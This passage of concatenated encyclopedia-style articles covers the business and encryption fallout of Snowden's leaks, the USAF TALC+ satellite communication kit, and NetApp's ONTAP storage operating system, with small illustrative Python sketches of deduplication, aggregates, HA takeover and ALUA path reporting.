Proposed laws in more than a dozen foreign countries, including Germany, Brazil, and India, would make it harder for U.S. firms to do business there. The European Union is considering stricter domestic privacy legislation that could result in fines and penalties costing U.S. firms billions of dollars. In August 2014, Massachusetts-based web intelligence firm Recorded Future announced it had found a direct connection between Snowden's leaks and dramatic changes in how Islamist terrorists interacted online. (In 2010, the privately held Recorded Future received an investment from In-Q-Tel, a nonprofit venture capital firm whose primary partner is the CIA.) Just months after Snowden's 2013 leaks, said Recorded Future, operatives of al-Qaeda and associated groups completely overhauled their 7-year-old encryption methods, which had included "homebrewed" algorithms, adopting instead more sophisticated open-source software and newly available downloads that enabled encryption on cellphones, Android products, and Macs, to help disguise their communications. In September 2014, Seattle-based deep-web and dark-web monitoring firm Flashpoint Global Partners published a report that found "very little open-source information available via jihadi online social media" indicating that Snowden's leaks impelled al-Qaeda to develop more secure digital communications. "The underlying public encryption methods employed by online jihadists," the report concluded, "do not appear to have significantly changed since the emergence of Edward Snowden. Major recent technological advancements have focused primarily on expanding the use of encryption to instant messenger and mobile communications mediums." In May 2015, The Nation reported, "The fallout from the Edward Snowden fiasco wasn't just political—it was largely economic.
Soon after the extent of the NSA's data collection became public, overseas customers (including the Brazilian government) started abandoning U.S.-based tech companies in droves over privacy concerns. The dust hasn't settled yet, but tech-research firm Forrester estimated the losses may total 'as high as $180 billion,' or 25 percent of industry revenue."

Consumer products

In September 2014, The New York Times credited Apple Inc.'s update of iOS 8, which encrypts all data stored on the device, as demonstrating how Snowden's impact had begun to work its way into consumer products. His revelations, said The Times, "not only killed recent efforts to expand the law, but also made nations around the world suspicious that every piece of American hardware and software—from phones to servers made by Cisco Systems—have 'back doors' for American intelligence and law enforcement." The Times situated this development within a "Post Snowden Era" in which Apple would no longer comply with NSA and law enforcement requests for user data, instead maintaining that it does not possess the key to unlock data on the iPhone. However, because the new security protects information stored on the device itself, but not data stored on Apple's iCloud service, Apple will still be able to hand over some customer information stored on iCloud in response to government requests. The Times added that Google's Android would have encryption enabled by default in upcoming versions.

References
TALC+
The Tanker Airborne Long-range Communication Plus (TALC+) Kit is a USAF satellite communication system for low-data-rate, classified communications. TALC+ includes an Iridium radio-modem, an antenna installed in the sextant port, a strong encryption device, a classified laptop computer, a handset, and a headset, all within a carry-on-sized case. TALC+ provides KC-135 aircraft with affordable, secure, global, and simple communication. TALC+ can call almost any telephone worldwide for non-secure voice communication, talk at up to the Secret level with STEs (or other SCIP-based telephones), or join chatrooms on SIPRNet. TALC+ may be customized, renamed, and certified for other platforms such as KC-10s, C-130s, and other Iridium-compatible aircraft, trucks, or buildings. TALC+ was created by the Air Force Research Laboratory's Center for Rapid Innovation and NAL Research Corporation in response to requests from AMC and AFGSC leadership. TALC+ has been purchased by the Air Mobility Command and is in use on the MC-130J. A four-chapter video explaining how to install and use TALC+ is available by logging into milTube with a CAC and searching for TALC+.

References
ONTAP
ONTAP, also known as Data ONTAP, Clustered Data ONTAP (cDOT), or Data ONTAP 7-Mode, is NetApp's proprietary operating system used in storage disk arrays such as NetApp FAS and AFF, ONTAP Select, and Cloud Volumes ONTAP. With the release of version 9.0, NetApp simplified the name by dropping the word "Data" and removed the 7-Mode image; ONTAP 9 is therefore the successor to Clustered Data ONTAP 8. ONTAP includes code from Berkeley Net/2 BSD Unix, Spinnaker Networks technology, and other operating systems. ONTAP originally supported only NFS, but later added support for SMB, iSCSI, and the Fibre Channel Protocol (including Fibre Channel over Ethernet and FC-NVMe). On June 16, 2006, NetApp released two variants of Data ONTAP: Data ONTAP 7G and, as a nearly complete rewrite, Data ONTAP GX. Data ONTAP GX was based on grid technology acquired from Spinnaker Networks. In 2010 these software product lines merged into one OS, Data ONTAP 8, which folded Data ONTAP 7G onto the Data ONTAP GX cluster platform. Data ONTAP 8 includes two distinct operating modes held in a single firmware image, called ONTAP 7-Mode and ONTAP Cluster-Mode. The last version of ONTAP 7-Mode issued by NetApp was 8.2.5; all subsequent versions (8.3 and onward) have only one operating mode, ONTAP Cluster-Mode. Most large storage arrays from other vendors use commodity hardware with an operating system such as Microsoft Windows Server, VxWorks, or tuned Linux. NetApp storage arrays use highly customized hardware and the proprietary ONTAP operating system, both originally designed by NetApp founders David Hitz and James Lau specifically for storage-serving purposes. ONTAP is NetApp's internal operating system, specially optimized for storage functions at both high and low level. The original version of ONTAP had a proprietary non-UNIX kernel and took its TCP/IP stack, networking commands, and low-level startup code from BSD.
The version descended from Data ONTAP GX boots from FreeBSD as a stand-alone kernel-space module and uses some functions of FreeBSD (for example, its command interpreter and driver stack). ONTAP is also used in virtual storage appliances (VSA), such as ONTAP Select and Cloud Volumes ONTAP, both of which are based on a previous product named Data ONTAP Edge. All hardware storage arrays include battery-backed non-volatile memory, which allows them to commit writes to stable storage quickly without waiting on disks; virtual storage appliances use virtual non-volatile memory instead. Implementers often organize two storage systems in a high-availability cluster with a private high-speed link, either Fibre Channel, InfiniBand, 10 Gigabit Ethernet, 40 Gigabit Ethernet, or 100 Gigabit Ethernet. Such clusters can additionally be grouped under a single namespace when running in the "cluster mode" of the Data ONTAP 8 operating system or on ONTAP 9. Data ONTAP was also made available for commodity x86 servers, running atop the VMware vSphere hypervisor, under the name "ONTAP Edge". ONTAP Edge was later renamed ONTAP Select, and KVM was added as a supported hypervisor.

History

Data ONTAP, including WAFL, was developed in 1992 by David Hitz, James Lau, and Michael Malcolm. Initially it supported NFSv2; the CIFS protocol was introduced in Data ONTAP 4.0 in 1996. In April 2019, Octavian Tanase, SVP ONTAP, posted a preview photo on his Twitter account of ONTAP running in Kubernetes as a container for a demonstration.

WAFL File System

The Write Anywhere File Layout (WAFL) is the file layout used by the ONTAP OS. It supports large, high-performance RAID arrays, quick restarts without lengthy consistency checks in the event of a crash or power failure, and quick growth of filesystem sizes.

Storage Efficiencies

The ONTAP OS contains a number of storage efficiency features, which are based on WAFL functionality. They are supported by all protocols and do not require licenses.
In February 2018, NetApp claimed that its clients' AFF systems achieved an average 4.72:1 storage efficiency from deduplication, compression, compaction, and clone savings. Starting with ONTAP 9.3, the offline deduplication and compression scanners start automatically by default, triggered by the percentage of new data written rather than by a schedule. Overall data reduction is the sum of the volume efficiencies, the aggregate efficiencies, and zero-block deduplication.

Volume efficiencies can be enabled or disabled individually, on a volume-by-volume basis:
Offline volume deduplication, which works at the 4 KB block level
Offline volume compression, also known as post-process (or background) compression, added later in two variants: post-process secondary compression and post-process adaptive compression
Inline volume deduplication and inline volume compression, which process some of the data on the fly before it reaches the disks; they are designed to leave data uncompressed when ONTAP judges that on-the-fly processing would take too long, and to let the other storage efficiency mechanisms handle that data later. There are two types of inline volume compression: inline adaptive compression and inline secondary compression.

Aggregate-level storage efficiencies include:
Data compaction, a mechanism that packs multiple data blocks smaller than 4 KB into a single 4 KB block
Inline aggregate-wide data deduplication (IAD) and post-process aggregate deduplication, also known as cross-volume deduplication, which share common blocks between volumes in an aggregate. IAD can throttle itself when the storage system crosses a certain threshold. The current limit on the physical space of a single SSD aggregate is 800 TiB.
Inline zero-block deduplication, which deduplicates zero-filled blocks on the fly before they reach the disks

Snapshots and FlexClones are also considered efficiency mechanisms.
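The block-level deduplication described above can be illustrated with a short sketch. This is a simplified, hypothetical model, not ONTAP's implementation: real ONTAP tracks checksums in WAFL metadata databases, while here a plain Python dict maps block fingerprints to stored blocks.

```python
import hashlib

BLOCK_SIZE = 4096  # ONTAP deduplicates at the 4 KB block level

def deduplicate(blocks):
    """Return (unique_blocks, block_map) for a list of 4 KB blocks.

    Each incoming block is fingerprinted; a block whose fingerprint has
    already been seen is stored as a reference to the existing copy,
    mimicking how a deduplication database maps checksums to blocks.
    """
    seen = {}          # fingerprint -> index into unique storage
    unique = []        # physically stored blocks
    block_map = []     # logical block number -> physical block index
    for block in blocks:
        fp = hashlib.sha256(block).hexdigest()
        if fp not in seen:
            seen[fp] = len(unique)
            unique.append(block)
        block_map.append(seen[fp])
    return unique, block_map

# three logical blocks, two of them identical
data = [b"A" * BLOCK_SIZE, b"B" * BLOCK_SIZE, b"A" * BLOCK_SIZE]
unique, block_map = deduplicate(data)
print(len(data), len(unique))   # 3 logical blocks, 2 physical blocks
print(block_map)                # [0, 1, 0]
```

The same fingerprint-lookup idea applies whether the scan runs inline (before data reaches disk) or post-process (over data already written); only the trigger differs.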
Starting with ONTAP 9.4, data is deduplicated by default across the active file system and all the snapshots on the volume. The savings from snapshot sharing grow with the number of snapshots: the more snapshots there are, the greater the savings, so snapshot sharing yields the most on SnapMirror destination systems. Thin provisioning is also available. The cross-volume deduplication efficiency features work only on SSD media. The inline and offline deduplication mechanisms rely on databases of checksums and links to the data blocks already handled by the deduplication process; such a database exists on each volume and each aggregate where deduplication is enabled. All Flash FAS systems do not support post-process compression.

Storage efficiencies execute in the following order:
1. Inline zero-block deduplication
2. Inline compression: adaptive compression for files that can be compressed to 8 KB, secondary compression for files larger than 32 KB
3. Inline deduplication: volume first, then aggregate
4. Inline adaptive data compaction
5. Post-process compression
6. Post-process deduplication: volume first, then aggregate

Aggregates

One or more RAID groups form an "aggregate", and within aggregates the ONTAP operating system sets up "flexible volumes" (FlexVol) to actually store the data users can access. Similarly to RAID 0, each aggregate consolidates the space of its underlying protected RAID groups into one logical pool of storage for flexible volumes. Besides aggregates built from NetApp's own disks and RAID groups, an aggregate can consist of LUNs already protected by third-party storage systems, using FlexArray, ONTAP Select, or Cloud Volumes ONTAP; each aggregate consists either of LUNs or of NetApp's own RAID groups, but not both. An alternative is the "traditional volume", in which one or more RAID groups form a single static volume.
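The aggregate hierarchy just described, RAID groups pooled into an aggregate with flexible volumes carved out of the shared pool, can be sketched as a toy model. All class and method names here are illustrative, not ONTAP APIs.

```python
class Aggregate:
    """Toy model: an aggregate pools the capacity of its underlying
    RAID groups (much as RAID 0 pools disks), and flexible volumes
    draw space from that shared pool."""

    def __init__(self, raid_group_sizes_gb):
        self.capacity_gb = sum(raid_group_sizes_gb)
        self.flexvols = {}  # volume name -> size in GB

    def free_gb(self):
        return self.capacity_gb - sum(self.flexvols.values())

    def create_flexvol(self, name, size_gb):
        if size_gb > self.free_gb():
            raise ValueError("not enough space in aggregate")
        self.flexvols[name] = size_gb

    def resize_flexvol(self, name, new_size_gb):
        # Unlike traditional volumes, FlexVols can be resized at any time,
        # as long as the aggregate's shared pool has room.
        delta = new_size_gb - self.flexvols[name]
        if delta > self.free_gb():
            raise ValueError("not enough space in aggregate")
        self.flexvols[name] = new_size_gb

# two RAID groups of 10 TB each pooled into one aggregate
aggr = Aggregate([10_000, 10_000])
aggr.create_flexvol("vol1", 4_000)
aggr.create_flexvol("vol2", 6_000)
aggr.resize_flexvol("vol1", 8_000)   # grown online, same shared pool
print(aggr.free_gb())                # 6000 GB left for other volumes
```

A traditional volume, by contrast, would bind its RAID groups to a single fixed volume: no shared pool, no resizing, which is exactly the flexibility FlexVols were introduced to add.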
Flexible volumes offer the advantage that many of them can be created on a single aggregate and resized at any time. Smaller volumes can then share all of the spindles available to the underlying aggregate, and in combination with storage QoS the performance of flexible volumes can be changed on the fly, which traditional volumes do not allow. However, traditional volumes can (theoretically) handle slightly higher I/O throughput than flexible volumes with the same number of spindles, as they do not have to go through an additional virtualization layer to talk to the underlying disk. Aggregates and traditional volumes can only be expanded, never contracted. The current maximum usable physical aggregate size is 800 TiB on All-Flash FAS systems.

7-Mode and earlier

The first form of redundancy added to ONTAP was the ability to organize pairs of NetApp storage systems into a high-availability cluster (HA pair); an HA pair could scale capacity by adding disk shelves. When the performance maximum of an HA pair was reached, there were two ways to proceed: buy another storage system and divide the workload between them, or buy a new, more powerful storage system and migrate the entire workload to it. AFF and FAS storage systems were usually able to connect the old disk shelves from previous models, a process called a head-swap. A head-swap requires downtime for re-cabling but gives the new controllers access to the old data without system reconfiguration. From Data ONTAP 8, each firmware image contained two operating systems, called "modes": 7-Mode and Cluster-Mode. Both modes could be used on the same FAS platform, one at a time. However, data written in one mode was not compatible with the other, which mattered when converting a FAS system from one mode to the other or when re-cabling disk shelves from 7-Mode to Cluster-Mode and vice versa.
Later, NetApp released the 7-Mode Transition Tool (7MTT), which can convert data on old disk shelves from 7-Mode to Cluster-Mode; this process, named Copy-Free Transition, requires downtime. With version 8.3, 7-Mode was removed from the Data ONTAP firmware image.

Clustered ONTAP

Clustered ONTAP is a newer, more advanced OS than its predecessor Data ONTAP (version 7, and version 8 in 7-Mode); it can scale out by adding new HA pairs to a single-namespace cluster, with transparent data migration across the entire cluster. In version 8.0, a new aggregate type, the 64-bit aggregate, was introduced, raising the 16-terabyte (TB) aggregate size limit of previous Data ONTAP releases. In version 9.0, nearly all of the features from 7-Mode, including SnapLock, had been successfully implemented in (Clustered) ONTAP, while many features not available in 7-Mode were introduced, such as FlexGroup and FabricPool, along with new capabilities such as fast workload provisioning and Flash optimization. A distinctive capability of NetApp's Clustered ONTAP is its support for heterogeneous clusters, in which the systems in a single cluster do not all have to be of the same model or generation. This provides a single pane of glass for managing all the nodes in a cluster, and non-disruptive operations such as adding new models to a cluster, removing old nodes, and online migration of volumes and LUNs while the data remains continuously available to clients. In version 9.0, NetApp renamed Data ONTAP to ONTAP.

Data protocols

ONTAP is considered a unified storage system, meaning that it supports both block-level (FC, FCoE, NVMeoF, and iSCSI) and file-level (NFS, pNFS, CIFS/SMB) protocols for its clients. SDS versions of ONTAP (ONTAP Select and Cloud Volumes ONTAP) do not support the FC, FCoE, or NVMeoF protocols, due to their software-defined nature.
NFS

NFS was the first protocol available in ONTAP. The latest versions of ONTAP 9 support NFSv2, NFSv3, NFSv4 (4.0 and 4.1), and pNFS. Starting with ONTAP 9.5, 4-byte UTF-8 sequences, for characters outside the Basic Multilingual Plane, are supported in names for files and directories.

SMB/CIFS

ONTAP supports CIFS 2.0 and higher, up to SMB 3.1. Starting with ONTAP 9.4, SMB Multichannel, which provides functionality similar to multipathing in SAN protocols, is supported. Starting with ONTAP 8.2, the CIFS protocol supports Continuous Availability (CA) with SMB 3.0 for Microsoft Hyper-V over SMB and SQL Server over SMB. ONTAP supports SMB encryption, also known as sealing; accelerated AES instructions (Intel AES NI) encryption is supported in SMB 3.0 and later.

FCP

On physical appliances, ONTAP supports FCoE as well as the FC protocol, depending on HBA port speed.

iSCSI

iSCSI with the Data Center Bridging (DCB) protocol is supported on A220/FAS2700 systems.

NVMeoF

NVMe over Fabrics (NVMeoF) refers to the ability to use the NVMe protocol over existing network infrastructure, such as Ethernet (converged or traditional), TCP, Fibre Channel, or InfiniBand, for transport (as opposed to running NVMe over PCIe). NVMe is a block-level SAN data storage protocol. NVMeoF is supported only on all-flash A-series systems, and not on the low-end A200 and A220 systems. Starting with ONTAP 9.5, the ANA protocol is supported, which provides NVMe with multipathing functionality similar to ALUA. ANA for NVMe is currently supported only with SUSE Linux Enterprise 15; FC-NVMe without ANA is supported with SUSE Linux Enterprise 12 SP3 and Red Hat Enterprise Linux 7.6.

FC-NVMe

FC-NVMe is supported on systems with 32 Gbps FC ports or higher speeds. The operating systems supported with FC-NVMe are Oracle Linux, VMware, Windows Server, SUSE Linux, and Red Hat Linux.
High Availability

High availability (HA) is a clustered configuration of a storage system with two nodes, the HA pair, which aims to ensure an agreed level of operation during expected and unexpected events such as reboots and software or firmware updates.

HA Pair

Even though a single HA pair consists of two nodes (or controllers), NetApp has designed it in such a way that it behaves as a single storage system. HA configurations in ONTAP employ a number of techniques to present the two nodes of the pair as a single system. This allows the storage system to provide its clients with nearly uninterrupted access to their data should a node either fail unexpectedly or need to be rebooted, in an operation known as a "takeover". For example, on the network level, ONTAP temporarily migrates the IP addresses of the downed node to the surviving node, and where applicable it also temporarily switches ownership of FC WWPNs from the downed node to the surviving node. On the data level, the contents of the disks assigned to the downed node automatically become available through the surviving node. FAS and AFF storage systems use enterprise-level HDD and SSD drives housed in disk shelves that have two bus ports, with one port connected to each controller. All of ONTAP's disks carry an ownership marker, written to the disk, recording which controller in the HA pair owns and serves that disk. An aggregate can include only disks owned by a single node; each aggregate is therefore owned by one node, and any objects built on top of it, such as FlexVol volumes, LUNs, and file shares, are served by a single controller. Since each controller can have its own disks and aggregates and serve them, such HA pair configurations are called Active/Active: both nodes are utilized simultaneously, even though they are not serving the same data.
Once the downed node of the HA pair has been repaired, or whatever maintenance necessitated the takeover has been completed, and the downed node is up and running without issue, a "giveback" command can be issued to bring the HA pair back to Active/Active status.

HA interconnect

High-availability clusters (HA clusters) were the first type of clusterization introduced in ONTAP systems, aimed at ensuring an agreed level of operation. This is often confused with the horizontal-scaling ONTAP clusterization that came from the Spinnaker acquisition; NetApp therefore refers in its documentation to an HA configuration as an HA pair rather than an HA cluster. An HA pair uses some form of network connectivity (often direct connectivity) for communication between the two servers in the pair, called the HA interconnect (HA-IC). The HA interconnect can use Ethernet or InfiniBand as the communication medium. It is used for non-volatile memory log (NVLOG) replication over RDMA and for a few other purposes, always between the two nodes of an HA pair, solely to ensure the agreed level of operation during events like reboots. ONTAP assigns dedicated, non-sharable HA ports for the HA interconnect, which can be external or built into the chassis (and not visible from the outside). The HA-IC should not be confused with the intercluster or intracluster interconnect used for SnapMirror, which can coexist with data protocols on data ports, or with the cluster interconnect ports used for horizontal scaling and online data migration across a multi-node cluster. HA-IC interfaces are visible only at the node shell level. Starting with the A320, HA-IC and cluster interconnect traffic use the same ports.
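The takeover and giveback cycle described above can be sketched as a small state model. This is an illustrative toy, with hypothetical names; real ONTAP moves IP addresses, WWPNs, and disk ownership through dedicated subsystems.

```python
class HaPair:
    """Toy model of an ONTAP HA pair: on takeover the surviving node
    temporarily serves the downed node's IP addresses and aggregates;
    giveback restores Active/Active operation."""

    def __init__(self):
        # each node owns its own disks/aggregates and IP addresses
        self.resources = {
            "node1": {"ip": "10.0.0.1", "aggrs": ["aggr1"]},
            "node2": {"ip": "10.0.0.2", "aggrs": ["aggr2"]},
        }
        self.taken_over = None  # node currently down, if any

    def serving_node(self, owner):
        """Return the node currently serving the resources of `owner`."""
        if owner == self.taken_over:
            # the HA partner serves the downed node's resources
            return "node1" if owner == "node2" else "node2"
        return owner

    def takeover(self, failed_node):
        self.taken_over = failed_node

    def giveback(self):
        self.taken_over = None

pair = HaPair()
pair.takeover("node2")
print(pair.serving_node("node2"))  # node1 serves node2's IP and aggregates
pair.giveback()
print(pair.serving_node("node2"))  # node2 serves its own resources again
```

Clients keep addressing the same IP throughout, which is why the pair behaves as a single storage system from the outside.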
MetroCluster

MetroCluster (MC) adds a level of data availability beyond HA configurations and is supported only with FAS and AFF storage systems; an SDS version of MetroCluster was later introduced with the ONTAP Select and Cloud Volumes ONTAP products. In an MC configuration, two storage systems (each a single node or an HA pair) form the MetroCluster. The two systems are often located at two sites up to 300 km apart, hence the description "geo-distributed system". Plex is the key underlying technology that synchronizes the data between the two sites. In MC configurations the NVLOG is also replicated between the storage systems at the two sites, but over dedicated ports, in addition to the HA interconnect. Starting with ONTAP 9.5, SVM-DR is supported in MetroCluster configurations.

MetroCluster SDS

MetroCluster SDS (MC SDS) is a feature of the ONTAP Select software. Similarly to MetroCluster on FAS/AFF systems, it synchronously replicates data between two sites using SyncMirror and automatically switches to the surviving node, transparently to users and applications. MetroCluster SDS works as an ordinary HA pair, so data volumes, LUNs, and LIFs can be moved online between aggregates and controllers at both sites. This differs slightly from traditional MetroCluster on FAS/AFF systems, where data can be moved across the storage cluster only within the site where it was originally located; in traditional MetroCluster, the only way for applications to access data locally at the remote site is to disable an entire site, a process called switchover, whereas in MC SDS the ordinary HA process occurs. MetroCluster SDS uses ONTAP Deploy as the mediator (in the FAS and AFF world this functionality is known as the MetroCluster tiebreaker). ONTAP Deploy comes bundled with ONTAP Select and is generally used for deploying clusters, installing licenses, and monitoring them.
Horizontal Scaling Clusterization

Horizontal-scaling ONTAP clusterization came from the Spinnaker acquisition and is often referred to by NetApp as "Single Namespace", "Horizontal Scaling Cluster", "ONTAP Storage System Cluster", or just "ONTAP Cluster"; it is therefore often confused with the HA pair or even with MetroCluster functionality. While MetroCluster and HA are data protection technologies, single-namespace clusterization does not provide data protection. An ONTAP cluster is formed from one or more HA pairs and adds non-disruptive operations (NDO) functionality to the system, such as non-disruptive online data migration across the nodes of the cluster and non-disruptive hardware upgrades. Data migration for NDO operations in an ONTAP cluster requires dedicated Ethernet ports, called the cluster interconnect, and does not use the HA interconnect for this purpose. The cluster interconnect and the HA interconnect cannot share the same ports. A cluster with a single HA pair can have directly connected cluster interconnect ports, while systems with four or more nodes require two dedicated Ethernet cluster interconnect switches. An ONTAP cluster can consist only of an even number of nodes (which must be configured as HA pairs), except for the single-node cluster, an ONTAP system also called non-HA or stand-alone. An ONTAP cluster is managed through a single pane of glass with built-in Web-based GUI, CLI (SSH and PowerShell), and API management. The ONTAP cluster provides a single namespace for NDO operations through the SVM. "Single namespace" in an ONTAP system is the name for a collection of techniques the cluster uses to decouple data from front-end network connectivity for data protocols like FC, FCoE, FC-NVMe, iSCSI, NFS, and CIFS, thereby providing a kind of data virtualization for online data mobility across cluster nodes.
On the network layer, the single namespace provides a number of techniques for non-disruptive IP address migration, such as CIFS Continuous Availability (transparent failover) and NetApp's network failover for NFS, and, for SAN, ALUA and path election for online re-balancing of front-end data traffic. A cluster of NetApp AFF and FAS storage systems can consist of different HA pairs, mixing AFF and FAS and different models and generations, and can include up to 24 nodes with NAS protocols or 12 nodes with SAN protocols. SDS systems cannot be intermixed with physical AFF or FAS storage systems.

Storage Virtual Machine

The Storage Virtual Machine (SVM), also known as a Vserver, is a layer of abstraction that, alongside other functions, virtualizes and separates the physical front-end data network from the data located on FlexVol volumes. It is used for non-disruptive operations and multi-tenancy, and it is the highest-level logical construct available in ONTAP. An SVM cannot be mounted under another SVM and can therefore be referred to as a global namespace. An SVM divides the storage system into slices, so that several divisions or even organizations can share the storage system without knowing about or interfering with each other, while using the same ports, data aggregates, and nodes in the cluster, with separate FlexVol volumes and LUNs. One SVM cannot create, delete, change, or even see the objects of another SVM, so to SVM owners the environment looks as if they are the only users of the entire storage system cluster.

Non Disruptive Operations

There are several non-disruptive operations (NDO) in a (Clustered) ONTAP system. NDO data operations include aggregate relocation between the nodes of an HA pair, online FlexVol volume migration (the Volume Move operation) across aggregates and nodes within the cluster, and LUN migration (the LUN Move operation) between FlexVol volumes within the cluster.
LUN Move and Volume Move operations use the cluster interconnect ports for data transfer (the HA-CI is not used for such operations). SVMs behave differently in network NDO operations depending on the front-end data protocol. To bring latency back to its original level, FlexVol volumes and LUNs have to be located on the same node as the network address through which the clients access the storage system, so a network address can be created (for SAN) or moved (for NAS protocols). NDO operations are free functionality.

NAS LIF

The NAS front-end data protocols, NFSv2, NFSv3, NFSv4 and CIFSv1, SMBv2, and SMBv3, do not provide network redundancy in the protocol itself, and so rely on storage and switch functionality for it. For this reason ONTAP supports Ethernet port channels and LACP on its Ethernet network ports at the L2 layer (known in ONTAP as an interface group, or ifgrp) within a single node, and also non-disruptive network failover between nodes in the cluster at the L3 layer, migrating logical interfaces (LIFs) and their associated IP addresses (similar to VRRP) to the surviving node and back home when the failed node is restored.

SAN LIF

For the front-end SAN data protocols, the ALUA feature is used for network load balancing and redundancy: all the ports on the node where the data is located are reported to clients as active preferred paths, with load balancing between them, while all network ports on all other nodes in the cluster are active non-preferred paths; if one port or an entire node goes down, the client still has access to its data over a non-preferred path. Starting with ONTAP 8.3, Selective LUN Mapping (SLM) was introduced to reduce the number of paths to a LUN: it removes the non-optimized paths through all cluster nodes except the HA partner of the node owning the LUN, so the cluster reports to the host only the paths from the HA pair where the LUN is located.
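The ALUA path reporting with SLM described above can be sketched as a small function. This is a simplified illustration, not ONTAP code; the node names and the function itself are hypothetical, and real path states are reported through the SCSI ALUA mechanism.

```python
def report_paths(cluster_nodes, owning_node, ha_partner, slm=True):
    """Toy ALUA path report for one LUN.

    Ports on the node owning the LUN are reported active/optimized.
    With Selective LUN Mapping (ONTAP 8.3+) only the owner and its HA
    partner report paths at all, so the host never sees non-optimized
    paths through every other node of the cluster.
    """
    paths = {}
    for node in cluster_nodes:
        if node == owning_node:
            paths[node] = "active/optimized"
        elif node == ha_partner or not slm:
            paths[node] = "active/non-optimized"
        # with SLM enabled, all other nodes report no path
    return paths

nodes = ["n1", "n2", "n3", "n4"]
print(report_paths(nodes, owning_node="n1", ha_partner="n2"))
# with SLM, only n1 (optimized) and n2 (non-optimized) are reported
```

If the owning node fails, its HA partner's non-optimized path keeps the LUN reachable until takeover completes, which is why SLM keeps exactly the HA pair's paths visible.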
Because ONTAP provides ALUA functionality for SAN protocols, SAN network LIFs do not migrate as they do with NAS protocols. When a data or network interface migration finishes, it is transparent to the storage system's clients thanks to the ONTAP architecture; it can cause temporary or permanent indirect data access through the ONTAP cluster interconnect (the HA-CI is not used in such situations), which slightly increases latency for the clients. SAN LIFs are used for the FC, FCoE, iSCSI, and FC-NVMe protocols.

VIP LIF

VIP (virtual IP) LIFs require a top-of-rack BGP router. BGP data LIFs, alongside NAS LIFs, can also be used over Ethernet in a NAS environment, but BGP LIFs automatically load-balance traffic based on routing metrics and avoid inactive, unused links. BGP LIFs provide distribution across all the NAS LIFs in a cluster, not limited to a single node as NAS LIFs are, and provide smarter load balancing than the hash algorithms of Ethernet port channels and LACP with interface groups. VIP LIF interfaces are tested and can be used with MCC and SVM-DR.

Management interfaces

The node management LIF can migrate, with its associated IP address, across the Ethernet ports of a single node and is available only while ONTAP is running on that node; it is usually located on the node's e0M port. The node management IP is sometimes used by the cluster administrator to reach the cluster shell through a particular node, in the rare cases where commands have to be issued from that node. The cluster management LIF, with its associated IP address, is available only while the entire cluster is up and running; it can migrate across Ethernet ports by default, is often located on one of the e0M ports of one of the cluster nodes, and is used by the cluster administrator for management purposes: API communication, the HTML GUI, and SSH console management. By default, ssh connects the administrator to the cluster shell.
The Service Processor (SP) interface is available only on hardware appliances like FAS and AFF; it allows out-of-band ssh console communication with a small embedded computer installed on the controller mainboard. Similarly to IPMI, it allows an administrator to connect to, monitor, and manage the controller even if the ONTAP OS is not booted; with the SP it is possible to forcibly reboot or halt a controller and to monitor fans, temperature, and so on. Connecting to the SP over ssh brings the administrator to the SP console, from which it is possible to switch to the cluster shell. Each controller has one SP, which does not migrate as some other management interfaces do. Usually the e0M and the SP both live on a single physical management (wrench) Ethernet port, but each has its own dedicated MAC address. Node LIFs, the cluster LIF, and the SPs often use the same IP subnet. The SVM management LIF, similarly to the cluster management LIF, can migrate across all the Ethernet ports of the cluster's nodes, but is dedicated to the management of a single SVM; it has no GUI capability and serves only API communication and SSH console management. The SVM management LIF can live on an e0M port but is often located on a data port of a cluster node, on a dedicated management VLAN, and can be on a different IP subnet from the node and cluster LIFs.

Cluster interfaces

The cluster interconnect LIFs use dedicated Ethernet ports and cannot share ports with management and data interfaces; they serve the horizontal-scaling functionality at times when, for example, a LUN or a volume migrates from one node of the cluster to another. Like node management LIFs, a cluster interconnect LIF can migrate between the ports of a single node. Intercluster LIFs can live on, and share, the same Ethernet ports as data LIFs and are used for SnapMirror replication; similarly to node management and cluster interconnect LIFs, an intercluster LIF can migrate between the ports of a single node.
Multi Tenancy
ONTAP provides two techniques for multi-tenancy: Storage Virtual Machines (SVMs) and IPspaces. On the one hand, SVMs are similar to virtual machines like KVM in that they provide a virtualization abstraction from physical storage; on the other hand, they are quite different because, unlike ordinary virtual machines, SVMs do not allow running third-party binary code as Pure Storage systems do; they only provide a virtualized environment and storage resources. Also, unlike ordinary virtual machines, an SVM does not run on a single node; to the end user it looks as if the SVM runs as a single entity on each node of the whole cluster. SVMs divide a storage system into slices, so a few divisions or even organizations can share the storage system without knowing about or interfering with each other, utilizing the same ports, data aggregates and nodes in the cluster while using separate FlexVol volumes and LUNs. Each SVM can run its own set of frontend data protocols and its own set of users, and use its own network addresses and management IP. With IPspaces, users can have the same IP addresses and networks on the same storage system without interference. Each ONTAP system must run at least one data SVM in order to function but may run more. There are a few levels of ONTAP management, and the cluster admin level has all of the available privileges. Each data SVM provides its owner with a vsadmin account, which has nearly the full functionality of the cluster admin level but lacks physical-level management capabilities like RAID group, aggregate and physical network port configuration. However, a vsadmin can manage logical objects inside an SVM: create, delete and configure LUNs, FlexVol volumes and network addresses. Two SVMs in a cluster cannot interfere with each other: one SVM cannot create, delete, modify or even see the objects of another SVM, so to SVM owners such an environment looks as if they are the only users of the entire storage cluster.
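The visibility rule at the heart of this isolation — a vsadmin sees only its own SVM's objects, while the cluster admin sees everything — can be sketched in a few lines. This is a hypothetical illustration; the object and SVM names are invented.

```python
# Hypothetical sketch of SVM object visibility. Names ("vs1", "vol_a", ...)
# are invented for illustration and are not real ONTAP identifiers.

objects = [
    {"name": "vol_a", "svm": "vs1"},
    {"name": "vol_b", "svm": "vs2"},
    {"name": "lun_1", "svm": "vs1"},
]

def visible_objects(role, svm=None):
    """Cluster admin sees everything; a vsadmin sees only its SVM's objects."""
    if role == "cluster_admin":
        return objects
    if role == "vsadmin":
        return [o for o in objects if o["svm"] == svm]
    raise ValueError(role)
```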
Multi-tenancy is free functionality in ONTAP.

FlexClone
FlexClone is a licensed feature used for creating writable copies of volumes, files or LUNs. In the case of volumes, a FlexClone acts like a snapshot that can be written to, while an ordinary snapshot is read-only. Because of the WAFL architecture, FlexClone copies only metadata inodes and provides nearly instantaneous copying of a file, LUN or volume regardless of its size.

SnapRestore
